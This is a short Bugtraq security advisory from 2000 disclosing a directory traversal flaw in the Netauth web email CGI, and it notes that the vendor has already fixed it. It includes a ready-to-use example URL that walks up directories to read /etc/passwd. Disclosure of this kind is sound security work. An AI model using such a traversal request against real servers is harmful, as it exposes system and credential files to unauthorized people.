[16292] in bugtraq
Netauth: Web Based Email Management System
daemon@ATHENA.MIT.EDU (Marc Maiffret)
Fri Aug 18 03:57:21 2000
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <NEBBJCLKGNOGCOIOBJNAGEHLCPAA.marc@eeye.com>
Date: Thu, 17 Aug 2000 12:11:17 +0100
Reply-To: marc@eeye.com
From: Marc Maiffret <marc@eeye.com>
To: BUGTRAQ@SECURITYFOCUS.COM
This is just a quick note of a simple hole in the Netauth system.
What is Netauth?
Netauth is a web based eMail management system for Windows NT and most Unix
platforms.
What is the hole?
The nethauth.cgi file
http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../..
/etc/passwd
What is the fix?
The Netauth developers (very cool guys) fixed this whole a few months back.
So just go to their website and download the latest version.
Vendor Homepage:
http://netwinsite.com/netauth/
We found this hole while testing CHAM HTTP, few more weeks till release.
http://www.eeye.com/retina
Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com
